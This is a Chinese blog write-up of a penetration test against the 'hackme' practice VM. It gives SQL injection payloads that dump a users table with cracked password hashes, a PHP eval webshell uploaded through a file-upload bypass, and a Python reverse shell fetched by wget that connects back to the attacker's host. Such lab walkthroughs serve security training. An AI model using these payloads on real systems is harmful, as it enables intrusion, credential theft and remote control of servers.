Hackme靶机-渗透学习

最新推荐文章于 2024-11-02 15:22:06 发布
最新推荐文章于 2024-11-02 15:22:06 发布
阅读量166 收藏
点赞数
文章标签: 学习 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47695901/article/details/131031881
版权

一、信息收集

arp-scan -l //主机发现

nmap -sV 192.168.0.173 //服务扫描

目录扫描

访问该链接http://192.168.64.137/register.php,是一个网站注册页面

创建一个密码为taidu00的用户taidu并登录,类似一个图书查询的网站

二、漏洞利用

1、验证sql注入 Windows OS' and 1=1#

Windows OS' and 1=2# //由此判断此存在注入点是字符型注入

2、判断字段数 Windows OS' order by 3#

Windows OS' order by 4#

判断只有3个字段

3、判断显示位置 1' union select 1,2,3#

4、查看当前数据库 1' union select 1,database(),3#

5、查看webapphacking数据库的所有表 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

6、查看users表中的字段名 1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'#

7、查看user,pasword字段中的数据 1' union select 1,group_concat(user),group_concat(pasword) from users#

8、对用户密码进行解密

user1

5d41402abc4b2a76b9719d911017c592

hello

user2

6269c4f71a55b24bad0f0267d9be5508

commando

user3

0f359740bd1cda994f8b55330c86d845

p@ssw0rd

test

05a671c66aefea124cc08b76ea6d30bb

testtest

superadmin

2386acb2cf356944177746fc92523983

Uncrackable

test1

05a671c66aefea124cc08b76ea6d30bb

testtest

admin

e10adc3949ba59abbe56e057f20f883e

123456

taidu

ceb05b0abdfb38da073bf5a745ddb7d4

taidu000

9、使用superadmin用户登录 密码:Uncrackable发现文件上传尝试文件

上传phpinfo()进行验证

制作假图片头 GIF89a<?php phpinfo(); ?>

上传前使用burp进行抓包

拦截-修改后缀,我们可以从回包中看出文件已将上传至文件夹

查看你目录扫描出的路径 http://192.168.0.173/uploads/phpinfo.php

10、利用文件上传漏洞

制作图片马 <?php @eval($_POST[shell]); ?>

上传前使用burp进行抓包

拦截-修改后缀,我们可以从回包中看出文件已将上传至文件夹

访问上传的图片马 http://192.168.0.173/uploads/b.php

蚁剑连接成功

上传反弹shell脚本

将反弹shell放在网站根目录下,开启http服务

service apache2 start

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.155",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

在蚁剑终端上下载 wget http://192.168.0.155/shell.py

kali监控1234端口

蚁剑运行shell.py

反弹shell成功

三、提权

1、识别所存在的用户 cat /etc/passwd | grep /bin/bash

通过以下命令获取一个标准shell

python -c 'import pty; pty.spawn("/bin/bash")'

2、在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件即可获取ROOT权限

wufen_tai
关注
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1103
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
Hackme靶机渗透
m0_50584370的博客
06-01 298
hackme靶机渗透
Hackme2靶机总结
qq_45301512的博客
12-17 422
(2) 先用最普通的测post的跑一下,发现不行,根据最后的提示,可以加上 –level 参数 和 –tramper=space2comment 参数。看了网上的答案,发现/home/legacy下存在一个touchmenot可执行文件,运行就能提权。使用msfvenom生成一个php的tiquan.php,上传到/var/www/html目录下。=eval 代替
靶机渗透练习14-hackme2
hirak0的博客
04-15 1042
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-2,618/ Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think ou
TryHackMe-Revenge
M1n9K1n9的博客
01-11 423
这样将能够获得第一个flag,至于该表的数据,我们暂且放下,因为我们有另一个更值得看的表system_user。然后修改/var/www/duckyinc/templates/index.html。我已经对网站进行了一些初步的枚举,因为我知道*一些*关于黑客的事情,但还不够。我知道是你黑了我的博客。你的技能给我留下了深刻的印象。只爆出了server-admin的密码,但那也足够了,现在登录ssh。并留下了一点足迹,所以我能够找到你。出于这个原因,我将让你做自己的枚举和检查。
hackme-1靶机渗透详解
大熊
06-12 653
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
靶机渗透 HACKME-2 (详细渗透,适合新手渗透
君莫hacker的博客
09-06 4180
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6882
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
渗透测试实战——hackme:1靶机
LRcaho的博客
04-24 3949
靶机地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.28.137 测试机系统:kali、win10 测试机IP:192.168.28.128 目录 一、信息收集 1.主机发现 2.端口扫描 3.服务扫描 4.目录扫描 5.访问目录扫描出的网站 二、漏洞探测 1.查看是否存在sql注入 2.sql注入 3.登录superadmin 三、getshell 1.上传一句话木
靶机渗透SickOs1.2(非常详细,适合新手渗透
君莫hacker的博客
09-08 7306
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
TryHackMe学习笔记-The Cod Caper
网安星空
12-17 1431
TryHackMe靶场,联系SQL注入、命令执行等常见漏洞和基本的缓冲区溢出提权
使用acme申请https免费证书
weixin_34194317的博客
03-25 1925
前言 ​ 上次写了一篇https证书相关的笔记整理,个人觉得有些地方欠妥,这次介绍一个更方便更简单更
vulnhub靶机hackme(DHCP)渗透测试
Long_gone的博客
12-04 1397
一、扫描 靶机打开后先用攻击机扫描靶机的IP地址: arp-scan 192.168.34.0/24 经过排除,确定靶机IP地址为:192.168.34.154,然后扫描一下靶机的端口开放情况: nmap -sV -A -p 0-65535 192.168.34.154 发现靶机只开放了22和80端口,然后再扫描一下80端口的目录: dirb http://192.168.34.154 ...
嵌入式通信协议:UART简明学习笔记
weixin_73867577的博客
10-31 772
学习UART串口的简明学习笔记
ORB-SLAM2源码学习:ORBextractor.cc:IC_Angle 利用灰度质心法求解关键点方向角
2301_76831056的博客
11-01 668
IC_Angle 利用灰度质心法求解关键点方向角并在computeOrientation函数中被调用计算图像中所有特征点的方向。
嵌入式通信协议:MODBUS简明学习笔记
最新发布
weixin_73867577的博客
11-02 237
学习Modbus的简明学习笔记
jsp web学习二(比较老的啦)
qq_52122048的博客
10-29 1078
JavaBean模式(MVC)适合开发复杂的web应用,在这种模式下,servlet负责处理用户请求,jsp负责数据显示,javabean负责封装数据。Servlet+JSP+JavaBean模式程序各个模块之间层次清晰,web开发推荐采用此种模式。一个良好的JavaWeb项目架构应该具有以上的11个包,这样显得层次分明,各个层之间的职责也很清晰明了,搭建JavaWeb项目架构时,就。
diffusion model 学习笔记
wubing's 博客
11-01 946
郎之万公式: 描述了粒子做随机布朗运动 (粒子位置随时间变化的关系), 是一种 SDE, 描述了 由梯度力(即.即我们在无条件模型 DDPM 估计的噪声中添加一个微小的扰动(. 基本上,在采样一半时,基本上预测的。输出的是噪声的估计, 这个估计的噪声。通过上面的公式,我们可以知道,当知道。),就可以作为条件模型的噪声估计.首先,假设我们已经有了一个训练好的。: 每一步中保留的原始信号的比例。的计算有各种不同的方法,). 已经接近于真实的。)影响的系统的时间演化.也就是,我们训练的网络。
学习力体系
m0_46221544的博客
10-29 355
在一个小镇上,有一位年轻的学者小明,梦想成为一名科 学家。然而,他总是感到学习困难,知识无法长久保持。有一天,他遇到了一位智者,智者告诉他:“学习的力量能够改变命运。”小明意识到,提升学习力是实现梦想的关键,从此开始探索学习方法的旅程。通过以上方法,小明的学习能力不断提升,最后实现了自己的梦想。每个人都可以通过这些方法来加强自身的学习力,迎接更加美好的未来。怎样才能让知识长久保持?如何有效地提升学习力?
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值